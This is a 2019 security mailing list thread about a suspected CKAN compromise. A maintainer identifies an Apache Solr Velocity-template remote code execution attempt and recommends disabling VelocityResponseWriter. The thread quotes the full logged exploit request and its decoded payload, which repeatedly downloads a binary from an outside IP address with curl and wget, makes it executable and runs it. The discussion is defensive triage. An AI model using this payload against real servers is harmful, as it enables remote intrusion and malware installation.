[CKAN-Security] Vulnerability in the WIld

Tyler Kennedy tk at tkte.ch
Wed Nov 6 19:00:15 UTC 2019 

This is what it tries to run (duplicate lines are not a mistake, this is a
script kiddie trying to piece something together so it is messy):

```
/usr/bin/curl -o /root/rter http://194.249.0.167/sites/default/files/sync
chmod +x /root/rter
chmod 777 /root/rter
/root/rter
/root/rter 2>&1
/usr/bin/curl -o /tmp/erta http://194.249.0.167/sites/default/files/sync
chmod +x /tmp/erta
chmod 777 /tmp/erta
/tmp/erta
/tmp/erta
/usr/bin/wget  -O /home/so*/fert
http://194.249.0.167/sites/default/files/sync
chmod 777 /home/so*/fert
/home/so*/fert
/home/so*/fert
/usr/bin/curl -o /var/tmp/etfet
http://194.249.0.167/sites/default/files/sync
chmod 777 /var/tmp/etfet
/var/tmp/etfet
/usr/bin/wgetak -O /var/tmp/rtsfv
http://194.249.0.167/sites/default/files/sync
chmod 777 /var/tmp/rtsfv
/var/tmp/rtsfv
/var/tmp/rtsfv
/usr/bin/curl -o /dev/shm/reuer
http://194.249.0.167/sites/default/files/sync
chmod 777 /dev/shm/reuer
/dev/shm/reuer
/usr/bin/wget -O /dev/shm/reuer
http://194.249.0.167/sites/default/files/sync
chmod 777 /dev/shm/reuer
```

On Wed, Nov 6, 2019 at 1:51 PM Tyler Kennedy <tk at tkte.ch> wrote:

> Hello.
>
> This is not a CKAN exploit, but an exploit in Solr allowing remote code
> execution. It is copied from
> https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template.
> Are you sure this actually affected you? You will see garbage in the logs
> that did nothing all the time as bots try to find exploits. Make sure
> VelocityResponseWriter is disabled (should be by default) and this exploit
> will do nothing.
>
> Thank you,
> Tyler Kennedy
>
> On Wed, Nov 6, 2019 at 12:49 PM Fabian Fink <fink at h0st.space> wrote:
>
>> Ckan 2.8.x
>> Solr 6.6.x
>> Solr Logs:
>>  webapp=/solr path=/select
>> params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('/bin/bash+-c+{echo,ICAvdXNyL2Jpbi9jdXJsIC1vIC9yb290L3J0ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgK3ggL3Jvb3QvcnRlciA7IGNobW9kIDc3NyAvcm9vdC9ydGVyIDsgL3Jvb3QvcnRlciA7ICAvcm9vdC9ydGVyIDI+JjEgOyAgL3Vzci9iaW4vY3VybCAtbyAvdG1wL2VydGEgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgK3ggL3RtcC9lcnRhIDsgY2htb2QgNzc3IC90bXAvZXJ0YSA7IC90bXAvZXJ0YSA7ICAvdG1wL2VydGEgOyAvdXNyL2Jpbi93Z2V0ICAtTyAvaG9tZS9zbyovZmVydCAgIGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyA7IGNobW9kIDc3NyAvaG9tZS9zbyovZmVydCAgIDsgL2hvbWUvc28qL2ZlcnQgOyAvaG9tZS9zbyovZmVydCAgOyAvdXNyL2Jpbi9jdXJsIC1vIC92YXIvdG1wL2V0ZmV0IGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyAgOyAgY2htb2QgNzc3IC92YXIvdG1wL2V0ZmV0IDsgL3Zhci90bXAvZXRmZXQgOyAvdXNyL2Jpbi93Z2V0YWsgLU8gL3Zhci90bXAvcnRzZnYgIGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyA7IGNobW9kIDc3NyAvdmFyL3RtcC9ydHNmdiAgOyAvdmFyL3RtcC9ydHNmdiA7IC92YXIvdG1wL3J0c2Z2IDsgIC91c3IvYmluL2N1cmwgLW8gL2Rldi9zaG0vcmV1ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jICA7ICBjaG1vZCA3NzcgL2Rldi9zaG0vcmV1ZXIgIDsvZGV2L3NobS9yZXVlciAgOyAgIC91c3IvYmluL3dnZXQgLU8gL2Rldi9zaG0vcmV1ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgNzc3IC9kZXYvc2htL3JldWVyICA7IC9kZXYvc2htL3JldWVyIA%3D%3D}|{base64,-d}|{bash,-i}'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity}
>> hits=0 status=0 QTime=0
>>
>> any version unaffected?
>> how could we fix it?
>>
>> --
>> You received this message because you are subscribed to the Google Groups
>> "CKAN Security" group.
>> To unsubscribe from this group and stop receiving emails from it, send an
>> email to security+unsubscribe at ckan.org.
>> _______________________________________________
>> CKAN security
>> https://lists.okfn.org/mailman/listinfo/security
>> https://lists.okfn.org/mailman/options/security/tk%40tkte.ch
>>
>> Repo: https://github.com/ckan/ckan-security
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20191106/aea134f0/attachment-0001.html>

More information about the Security mailing list